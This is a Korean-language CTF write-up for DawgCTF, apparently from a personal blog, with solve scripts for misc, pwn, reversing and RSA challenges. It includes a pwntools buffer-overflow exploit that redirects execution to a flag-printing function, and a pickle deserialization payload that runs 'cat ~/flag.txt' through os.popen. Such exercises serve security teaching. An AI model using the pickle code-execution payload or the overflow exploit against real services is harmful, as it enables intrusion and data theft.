MISC
1. Two Truths and a Fib (100)
Problem
Solve
위와 같이 nc서버에 접속하면 설명과 문제를 주는데 이 3개의 숫자 중에서 피보나치 수인 것을 입력하는 문제같다. 입력하기도 전에 엄청 빠르게 입력 종료가 된다.
따라서 pwntools로 데이터를 전송해야 한다. 미리 말하자면 문제가 1개가 아니라 총 100개였다. 따라서 100문제의 피보나치 수를 입력해야한다. 그래서 나는 미리 피보나치수를 생성해놓고 pwntools로 데이터를 파싱한 후, 피보나치 리스트에 있는 숫자를 보내도록 스크립트를 짰다.
Script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
r = remote('umbccd.io', 6000)
def create_fibo():
x = [0, 1]
for i in range(2, 100):
x.append(x[i-1] + x[i -2])
return x
def fib(fibo):
r.recvuntil('Correct!\n' , timeout = 5)
r.recvuntil('[' , timeout = 5)
data = str(r.recvuntil(']' , timeout = 5)[:-1])
data = data.replace('b', '')
data = data.replace('\'', '')
data = data.split(', ')
print(data)
result = ''
r.recvuntil('>> ' , timeout = 5)
for i in range(len(data)):
if(int(data[i]) in fibo):
result = data[i]
print(result)
r.sendline(result)
fibo = create_fibo()
for i in range(100):
fib(fibo)
r.interactive()
Result
FLAG
1
FLAG : DawgCTF{jU$T_l1k3_w3lc0me_w33k}
PWN
1. Bofit (125)
Problem
Solve
주어진 C파일을 확인해보면 다음과 같다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#include <stdio.h>
#include <stdbool.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
void win_game(){
char buf[100];
FILE* fptr = fopen("flag.txt", "r");
fgets(buf, 100, fptr);
printf("%s", buf);
}
int play_game(){
char c;
char input[20];
int choice;
bool correct = true;
int score = 0;
srand(time(0));
while(correct){
choice = rand() % 4;
switch(choice){
case 0:
printf("BOF it!\n");
c = getchar();
if(c != 'B') correct = false;
while((c = getchar()) != '\n' && c != EOF);
break;
case 1:
printf("Pull it!\n");
c = getchar();
if(c != 'P') correct = false;
while((c = getchar()) != '\n' && c != EOF);
break;
case 2:
printf("Twist it!\n");
c = getchar();
if(c != 'T') correct = false;
while((c = getchar()) != '\n' && c != EOF);
break;
case 3:
printf("Shout it!\n");
gets(input);
if(strlen(input) < 10) correct = false;
break;
}
score++;
}
return score;
}
void welcome(){
char input;
printf("Welcome to BOF it! The game featuring 4 hilarious commands to keep players on their toes\n");
printf("You'll have a second to respond to a series of commands\n");
printf("BOF it: Reply with a capital \'B\'\n");
printf("Pull it: Reply with a capital \'P\'\n");
printf("Twist it: Reply with a capital \'T\'\n");
printf("Shout it: Reply with a string of at least 10 characters\n");
printf("BOF it to start!\n");
input = getchar();
while(input != 'B'){
printf("BOF it to start!\n");
input = getchar();
}
while((input = getchar()) != '\n' && input != EOF);
}
int main(){
int score = 0;
welcome();
score = play_game();
printf("Congrats! Final score: %d\n", score);
return 0;
}
win_game 함수가 flag를 주는 함수이다. main함수를 보면 welcome 함수 호출후, play_game함수를 호출한다.
play_game을 보면 세 가지 게임이 랜덤으로 실행되는데, case3인 shout it! 부분에서 gets로 제한없이 입력받으므로 BOF가 터진다. 따라서 이를 이용하여 ret을 win_game함수로 덮고 반복문을 빠져나가면 flag를 얻을 수 있다.
Script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
r = remote('umbccd.io', 4100)
win = 0x401256
payload = b''
payload += b'A'*(56 - 8)
payload += b'B'*8
payload += p64(win)
r.sendline(b'B')
r.sendline(payload)
r.sendline('!')
r.interactive()
case가 랜덤이라 case3 걸릴 때까지 실행시키면 flag가 출력된다.
Result
FLAG
1
FLAG : DawgCTF{n3w_h1gh_sc0r3!!}
2. Jellyspotters (100)
Problem
Solve
nc 서버에 접속해보니 다음과 같이 커맨드를 입력하는 형식으로 되어있다.
help를 입력해보니 다음과 같이 나왔다.
그 중에 import가 눈에 띄었고, import os를 해봤다. 그런데 오류가 나면서 pickle 모듈을 이용하는 것을 확인하였다.
따라서 pickle 직렬화 취약점을 이용해서 ~/flag.txt를 읽을 수 있게 역직렬화를 진행하였다.
Script
1
2
3
4
5
6
7
8
9
import pickle
import base64
class exploit(object):
def __reduce__(self):
return (eval, ("__import__('os').popen('cat ~/flag.txt').read()",))
data = base64.b64encode(pickle.dumps(exploit())).decode('utf8')
print(data)
Result
1
gASVSwAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwvX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IH4vZmxhZy50eHQnKS5yZWFkKCmUhZRSlC4=
이 값을 import 하면 flag가 나올 것이다.
그런데 다 개행처리되어서 나온다. 그냥 하나하나 모았다.
FLAG
1
FLAG : DawgCTF{funn13st_s#$&_ive_3v3r_s33n}
REVERSING
1. Calculator (50)
Problem
exe파일 하나를 준다. 32프로그램으로 x32dbg를 사용하였다.
Solve
x32dbg로 문자열을 모아봤다.
수상한 문자열이 존재했고 저 문자열 주변에 breakpoint를 걸고 실행시켰다. 참고로 매개 변수를 넣어주어야 한다. x32dbg에서 main 인자넣는 방식은 다음과 같다.
1
[파일] -> [명령줄 바꾸기] -> 명령어 뒤에 인자 보내기
나는 그냥 간단하게 10 4 로 보냈다.
저기서 분기가 일어나는데 그냥 귀찮아서 분기를 바로 다음 명령으로 바꿨다.
그리고 계속해서 실행시키면 실행중인 cmd창에서 flag가 출력된다.
Result
FLAG
1
FLAG : DawgCTF{c4LcU14T0r_64}
2. Secret App (50)
Problem
Calculator와 비슷한 문제이다.
Solve
문자열 먼저 찾아보고 또 수상한 문자열 발견했다.
따라서 문자열 사용된 곳으로 가서 적당히 breakpoint걸고 실행시켰다.
이번엔 분기 바꿔도 flag가 출력되지 않았다. username과 password를 맞춰야 flag가 완성되는 것 같았다. 그래서 실행시키면서 username과 password가 무엇인지 분석했다.
1
2
username = not_username
password = not_password
위와 같은 문자열이 들어가야 correct 분기로 들어가는 것을 확인했다.
따라서 각각의 값을 입력하면 flag가 출력된다.
Result
FLAG
1
FLAG : DawgCTF{4pp_sup3r_53cret}
3. Sections (75)
Problem
Solve
실행시키면 hi. xor valid section data 이라는 문장과 프로그램이 종료된다. x32dbg로 분석해도 별로 볼게 없었다. 문제에서 sections라고 하길래 PEView를 통해 PE의 section을 확인해 보았다.
저기 section 부분에서 SECTION .flag 가 수상해보여서 확인해보았더니
16진수의 숫자가 존재했다. hex값들을 어떠한 얀산을 해서 FLAG로 만들 수 있을 거 같았다.
문제에서 xor을 언급했으므로 따라서 XOR연산을 진행했다. flag형식이 DawgCTF{} 이므로 D와 a의 hex값과 .flag 섹션에 있는 값인 0x32와 0x19를 각각 xor했다.
1
2
3
0x44 xor 0x32 = 0x78
0x61 xor 0x19 = 0x78
...
뒤에 있는 값들을 연산해도 똑같이 0x78이 나왔다. 따라서 각 헥스값들을 0x78(120)과 xor한 값을 아스키코드로 나타내면 flag가 나온다.
Script
1
2
3
4
5
6
7
8
9
10
11
flag = [0x3c, 0x19, 0x0f, 0x1f, 0x3b, 0x2c,
0x3e, 0x03, 0x4d,0x4b, 0x1b, 0x0c,
0x11, 0x17, 0x16, 0x0b, 0x59, 0x59, 0x05]
xor = 120
result = ''
for i in flag:
result += chr(i ^ xor)
print(result)
Result
1
DawgCTF{53ctions!!}
FLAG
1
FLAG : DawgCTF{53ctions!!}
CRYPTO
1. Really Secure Algorithm (150)
Problem
Solve
문제 파일은 다음과 같다.
1
2
3
n: 1063494238636905330671898279123020701722241177838742822812173978727720269828464796177466331816675300997219760473399150899338190503499441304612339501295713174906319744094945565844664372365921409430229356934682156557249826723147031652843433859344718768493183522524995480377138743798310313783408725321419870843554822150601536373735923419276343616677440442774544203945706641152517137477442684440329779076981535293867470891276594740058202983415251883426242386508849130959905432961654910957147313116759921173654729071152981682554792584462863534617943384988632032130835087976957452863581161399454295389753849954195624356779281196493728732643445649356033158461867533398892265000228558146288424480232820613034689816560319929705959290376265550914058448343308161173100473161643834475548888676356572581129193395124610558172636505697071928778350452726229098387020587814634712035171712313035012109421792643188405752849278190287414108308734638519593282032082768153331276317440224645157072560878195004847185217741752846484430459047014205368551175641186962966731731946128786111994668528579102737764964521437485037695161775036622411218739549286577109028626220150452705854596994751235894610227300222070678106023292138580496517177268042770934391185798181598618563332872419401223903806812404310665174941843727792999745655534108889130325189241267039092501129173520194489329592776789648244263220437261594447066833175026748830694496235756029688061559449109400248449366143822446893851310444152168531390880512280359096438303124398155397910138799660941243464476642041104225318910175143988510614445494598098558426300612294667831401095538851181871031466580808942102239297182977785401087460226345045290147371931284725756179151791539310603340196586480494033673522637677423221202352493653286430691931273676649062037570851083535722738207802574643773975006788646467981693396925922930573766914743566111012462215653872417726475122775377641591778444141816733462035690735543990556767891443301312941168828619850007793197693295002346977318117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
e: 322080206518256091443899533297838582806903462189212623492459529527398362853578807723331748892091281476489691674322396825893568981731186597175657851460964692083587224231830304595753200276915353388440323973696723177120007866661510911934423352216586106031397002127519163858107192766128665700540985814443511274004469695128927172454976219787146706562954392698315026949257322529441349029783228167181158744356828575460114272675952388130344874175195393881248661753342888300368969470477541152888408256683251028110005741172636776279619483668723660512026112365800539035538500635904281702733475127339140385714006560153071610279780303018848372325359598739283968138816333125764253403325773002607652913882484078902775827169048401031393263955166695217841400017855979724317225872294531492451624247032809524082714281043873127461832051383511298796820369453358960824162684362741938604084210435623099328622028419710290325683380378726085007158903982932912214314158223921219724759717266136246703830446993309980595073110001804483058339461412460693911416430728558495048873597685942089531373734578638349738930086910038003088294940942692030998047041393152747526278088574238755027474019265539054527491401757165011505470582647900401492273402847703170162847259159161319094910753659832147964969052296859561769298825881593753592121708897035728873795159475926749806998737812501868665513946666352941497086651818553871606417281352599234688183547212675353626023151426982640664474136377374110023532481101565870359846621748326349516467938614155834462639061592390266451169971250010491497379073868786106821570448253182042906240682833067783409574735400739329311810053094530811477002973464432651755811246151509011287858077298295987954915889199100328695730233096226912526329144478198121096489396083876129542516602969866961376423685647767885680559757094208574124411496017291060228388949556065235333802142865557844913535276572535282671404020237763405558477020152910105019008364237315330047605257380696367871417207254833979064342650664181309067142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
c: 329889278578044016824313741527705229624826354380113199851837764563746872233807021113693371778072747023303193661391256917654673579748983619101229337776995574989101525295578632981918777232038222679949264372167418981038519164359046193397794833575692294838270919137212503594644756884879905102382013616716795766055806380675079122193261937202152727372307035197702671407008933906723580158843896939160889881874945976423829414877735269690727711347872615864084627631956403177338185780100778564548976884299086453421725163428017908949325966904530291069025584097022695816511626589485257615664532774194555809017763622197728156453680059300808277471558450818004384751746190317910501772671219117514746584045928056487904112720801176609889740173288130073788687010544220250814378467249611243953690831406523455960639957029937819775398561228599467536715020954136970283137688613486109370883547218314163119613810764259334933209435078926856747403933578685724271075988136268967520808025339001863614193092075106995811355116213778057037256625729238040020810096266917394213617319914026291093309897483557317625696133298013326746629673265558468135602690674704939910172338556035967840157228859997765219241095551758253889312610691956445984657535082546460420349808372702307807697037778668585720318640246334216650054353036505301550387620089144331383076791604944171531121861009872807022569971425034887955393207445086587528972631782104261610625226982484798915695532492666822649105680868782554501246818156815043534857204078057748607289822387462529373683511672270708474273078574153649263666927268413520984191265086647728912692418609093325194826161869428270138209430215739290181617579745939639392608498596400274014103435747462262045586624613109970954762445247628187031774393639286689201449970646288560996969456145518290732375783779950601901268751888374247634804346090070762202809312421725537938059723148831745384765961875359917754708570262909323774973728101735046489385116839098154905761289565030660932858839402457684704605894701939226586411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055
N, e, C 를 준 것을 보아, RSA문제이다. 위너 공격이 안통했고, 그냥 N값 factor 구해서 phi를 이용해 d값 구한 후 C^d % N 하면 될 줄 알았는데 안되었다.
조금 수상한 점이 N을 소인수 분해했을 때, p와 q값이 같은 p^2 = N 이였다. 이와 같은 경우, phi 값은 (p - 1) * (p - 1) 이 아니라 (p - 1) * p 여야 된다는 것이다. 그래서 phi값을 (p - 1) * p 로 하면 flag가 나온다.
또 신기한 점은 phi값을 (p - 1) * p 가 아닌 (n - 1) * n 으로 해도 flag가 나왔다. 이 점은 따로 알아봐야할 것 같다.
Script
1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Util.number import long_to_bytes, inverse
n = 1063494238636905330671898279123020701722241177838742822812173978727720269828464796177466331816675300997219760473399150899338190503499441304612339501295713174906319744094945565844664372365921409430229356934682156557249826723147031652843433859344718768493183522524995480377138743798310313783408725321419870843554822150601536373735923419276343616677440442774544203945706641152517137477442684440329779076981535293867470891276594740058202983415251883426242386508849130959905432961654910957147313116759921173654729071152981682554792584462863534617943384988632032130835087976957452863581161399454295389753849954195624356779281196493728732643445649356033158461867533398892265000228558146288424480232820613034689816560319929705959290376265550914058448343308161173100473161643834475548888676356572581129193395124610558172636505697071928778350452726229098387020587814634712035171712313035012109421792643188405752849278190287414108308734638519593282032082768153331276317440224645157072560878195004847185217741752846484430459047014205368551175641186962966731731946128786111994668528579102737764964521437485037695161775036622411218739549286577109028626220150452705854596994751235894610227300222070678106023292138580496517177268042770934391185798181598618563332872419401223903806812404310665174941843727792999745655534108889130325189241267039092501129173520194489329592776789648244263220437261594447066833175026748830694496235756029688061559449109400248449366143822446893851310444152168531390880512280359096438303124398155397910138799660941243464476642041104225318910175143988510614445494598098558426300612294667831401095538851181871031466580808942102239297182977785401087460226345045290147371931284725756179151791539310603340196586480494033673522637677423221202352493653286430691931273676649062037570851083535722738207802574643773975006788646467981693396925922930573766914743566111012462215653872417726475122775377641591778444141816733462035690735543990556767891443301312941168828619850007793197693295002346977318117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
e = 322080206518256091443899533297838582806903462189212623492459529527398362853578807723331748892091281476489691674322396825893568981731186597175657851460964692083587224231830304595753200276915353388440323973696723177120007866661510911934423352216586106031397002127519163858107192766128665700540985814443511274004469695128927172454976219787146706562954392698315026949257322529441349029783228167181158744356828575460114272675952388130344874175195393881248661753342888300368969470477541152888408256683251028110005741172636776279619483668723660512026112365800539035538500635904281702733475127339140385714006560153071610279780303018848372325359598739283968138816333125764253403325773002607652913882484078902775827169048401031393263955166695217841400017855979724317225872294531492451624247032809524082714281043873127461832051383511298796820369453358960824162684362741938604084210435623099328622028419710290325683380378726085007158903982932912214314158223921219724759717266136246703830446993309980595073110001804483058339461412460693911416430728558495048873597685942089531373734578638349738930086910038003088294940942692030998047041393152747526278088574238755027474019265539054527491401757165011505470582647900401492273402847703170162847259159161319094910753659832147964969052296859561769298825881593753592121708897035728873795159475926749806998737812501868665513946666352941497086651818553871606417281352599234688183547212675353626023151426982640664474136377374110023532481101565870359846621748326349516467938614155834462639061592390266451169971250010491497379073868786106821570448253182042906240682833067783409574735400739329311810053094530811477002973464432651755811246151509011287858077298295987954915889199100328695730233096226912526329144478198121096489396083876129542516602969866961376423685647767885680559757094208574124411496017291060228388949556065235333802142865557844913535276572535282671404020237763405558477020152910105019008364237315330047605257380696367871417207254833979064342650664181309067142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
c = 329889278578044016824313741527705229624826354380113199851837764563746872233807021113693371778072747023303193661391256917654673579748983619101229337776995574989101525295578632981918777232038222679949264372167418981038519164359046193397794833575692294838270919137212503594644756884879905102382013616716795766055806380675079122193261937202152727372307035197702671407008933906723580158843896939160889881874945976423829414877735269690727711347872615864084627631956403177338185780100778564548976884299086453421725163428017908949325966904530291069025584097022695816511626589485257615664532774194555809017763622197728156453680059300808277471558450818004384751746190317910501772671219117514746584045928056487904112720801176609889740173288130073788687010544220250814378467249611243953690831406523455960639957029937819775398561228599467536715020954136970283137688613486109370883547218314163119613810764259334933209435078926856747403933578685724271075988136268967520808025339001863614193092075106995811355116213778057037256625729238040020810096266917394213617319914026291093309897483557317625696133298013326746629673265558468135602690674704939910172338556035967840157228859997765219241095551758253889312610691956445984657535082546460420349808372702307807697037778668585720318640246334216650054353036505301550387620089144331383076791604944171531121861009872807022569971425034887955393207445086587528972631782104261610625226982484798915695532492666822649105680868782554501246818156815043534857204078057748607289822387462529373683511672270708474273078574153649263666927268413520984191265086647728912692418609093325194826161869428270138209430215739290181617579745939639392608498596400274014103435747462262045586624613109970954762445247628187031774393639286689201449970646288560996969456145518290732375783779950601901268751888374247634804346090070762202809312421725537938059723148831745384765961875359917754708570262909323774973728101735046489385116839098154905761289565030660932858839402457684704605894701939226586411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055
phi = (p - 1) * p
d = inverse(e, phi)
M = pow(c,d,n)
print(long_to_bytes(M))
Result
1
b'DawgCTF{sm@ll_d_b1g_dr3am5}'
FLAG
1
FLAG : DawgCTF{sm@ll_d_b1g_dr3am5}
2. The Obligatory RSA Challenge (200)
Problem
Solve
문제 파일은 다음과 같다.
1
2
3
n = 475949103910858550021125990924158849158697270648919661828320221786290971910801162715741857913263841305791340620183586047714776121441772996725204443295179887266030140253810088374694440549840736495636788558700921470022460434066253254392608133925706614740652788148941399543678467908310542011120056872547434605870421155328267921959528599997665673446885264987610889953501339256839810594999040236799426397622242067047880689646122710665080146992099282095339487080392261213074797358333223941498774483959648045020851532992076627047052728717413962993083433168342883663806239435330220440022810109411458433074000776611396383445744445358833608257489996609945267087162284574007467260111258273237340835062232433554776646683627730708184859379487925275044556485814813002091723278950093183542623267574653922976836227138288597533966685659873510636714530467992896001651744874195741686965980241950250826962186888426335553052644834563667046655173614036106867858602780687612991191030530253828632354662026863532605714273940100720042141793891322151633985026545935269398026536029250450509019273191619994794225225837195941413997081931530563686314944827757612844439598729054246326818359094052377829969668199706378215473562124250809041972492524806233512261976041
e = 65537
c = 402152770613351738677048755708324474554170176764376236321890073753918413309501149040535095814748232081435325267703210634002909644227960630174709988528642707754801508241021668904011536073077213912653767687757898322382171898337974911700337832550299932085103965369544431307577718773533194882182023481111058393084914882624811257799702110086578537559675833661097129217671283819819802719020785020449340858391080587707215652771744641811550418602816414116540750903339669304799230376985830812200326676840611164703480548721567059811144937314764079780635943387160912954258110357655610465371113884532394048454506662310124118115282815379922723111955622863507979527460353779351769204461491799016534724821436662464400182076767643570270346372132221638470790194373337215168535861219992353368908816850146790012604023887493693793270280077392301335013736929937492555191042177475011094313978657365706039774511145223613781837484571546154539993982179172011867034689022507760853121804219571982660393205589671062476958539437099789304135763092469236641459611160765143625998223459045923936551054351546033776966693997323972592968414107451804594097481574453747907874383069514662912314790514989026350766602740419907710031860078783498791071782013064557781230616536
이 문제도 n값이 p^2 형태이고, Really Secure Algorithm 문제처럼 phi = (p - 1) * p 로 계산해서
d값을 구하고, C^d % N 을 진행하면 flag가 출력된다.
Script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from Crypto.Util.number import long_to_bytes, inverse
n = 475949103910858550021125990924158849158697270648919661828320221786290971910801162715741857913263841305791340620183586047714776121441772996725204443295179887266030140253810088374694440549840736495636788558700921470022460434066253254392608133925706614740652788148941399543678467908310542011120056872547434605870421155328267921959528599997665673446885264987610889953501339256839810594999040236799426397622242067047880689646122710665080146992099282095339487080392261213074797358333223941498774483959648045020851532992076627047052728717413962993083433168342883663806239435330220440022810109411458433074000776611396383445744445358833608257489996609945267087162284574007467260111258273237340835062232433554776646683627730708184859379487925275044556485814813002091723278950093183542623267574653922976836227138288597533966685659873510636714530467992896001651744874195741686965980241950250826962186888426335553052644834563667046655173614036106867858602780687612991191030530253828632354662026863532605714273940100720042141793891322151633985026545935269398026536029250450509019273191619994794225225837195941413997081931530563686314944827757612844439598729054246326818359094052377829969668199706378215473562124250809041972492524806233512261976041
e = 65537
c = 402152770613351738677048755708324474554170176764376236321890073753918413309501149040535095814748232081435325267703210634002909644227960630174709988528642707754801508241021668904011536073077213912653767687757898322382171898337974911700337832550299932085103965369544431307577718773533194882182023481111058393084914882624811257799702110086578537559675833661097129217671283819819802719020785020449340858391080587707215652771744641811550418602816414116540750903339669304799230376985830812200326676840611164703480548721567059811144937314764079780635943387160912954258110357655610465371113884532394048454506662310124118115282815379922723111955622863507979527460353779351769204461491799016534724821436662464400182076767643570270346372132221638470790194373337215168535861219992353368908816850146790012604023887493693793270280077392301335013736929937492555191042177475011094313978657365706039774511145223613781837484571546154539993982179172011867034689022507760853121804219571982660393205589671062476958539437099789304135763092469236641459611160765143625998223459045923936551054351546033776966693997323972592968414107451804594097481574453747907874383069514662912314790514989026350766602740419907710031860078783498791071782013064557781230616536
p = 21816257788879800226266741950501282709401872894176288619472731956291218914324742537604641219560786978413613510633536886641581153942571579359519401327796021367732695476711467566761398025402445133259848384123905962932802004021079944067083532491720877926448099933753336517689984808846750048960375488528766110009254176926887611598941876012437215971816681184483796662759984833863168641346915636162467824574775331116852844756225674938392321848711476249893809700776552828990831593983374320915711192051109410295925205263499219444742867868898381959251178728127024835656647566724333855154762699836449704050690295585931350731821
phi = (p-1)*(p)
d = inverse(e, phi)
M = pow(c,d,n)
print(long_to_bytes(M))
Result
1
b'DawgCTF{wh0_n33ds_Q_@nyw@y}'
FLAG
1
FLAG : DawgCTF{wh0_n33ds_Q_@nyw@y}